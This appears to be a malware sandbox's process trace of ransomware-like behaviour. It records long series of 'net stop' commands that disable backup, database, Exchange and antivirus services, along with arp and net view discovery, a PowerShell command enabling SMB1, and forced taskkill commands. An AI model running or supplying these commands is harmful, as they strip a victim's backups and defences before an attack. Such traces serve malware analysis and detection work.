C:\Windows\SysWOW64\net.exe"net.exe" stop SMTPSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploySvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop UI0Detect /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop UI0Detect /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfefire /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos File Scanner Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFramework /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop W3Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop W3Svc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamMountSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSRS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Zoolz 2 Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Health Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfemms /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RESvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c net view2⤵
-
C:\Windows\SysWOW64\net.exenet view3⤵
- Discovers systems in the same network
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop IISAdmin /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeimap4 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ARSM /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeadtopology /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeadtopology /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL57 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Smcinst /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Message Router” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McShield /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROD /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ShMonitor /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SepMasterService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVAdminService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AVP /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AVP /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamRESTSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKey /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKey /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McTaskManager /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop OracleClientCache80 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y3⤵
-
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SmcService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL80 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SntpService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SntpService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop audioendpointbuilder /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vapiendpoint /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop WRSVC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WRSVC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyScheduler /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSafeOLRService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop tmlisten /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop tmlisten /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TmCCSF /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TmCCSF /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop svcGenericHost /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophossps /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophossps /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update_64 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_service /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_filter /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_filter /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DCAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EraserSvc11710 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Agent” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sacsvr /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeES /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sms_site_sql_backup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROD /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfevtp /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Antivirus /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
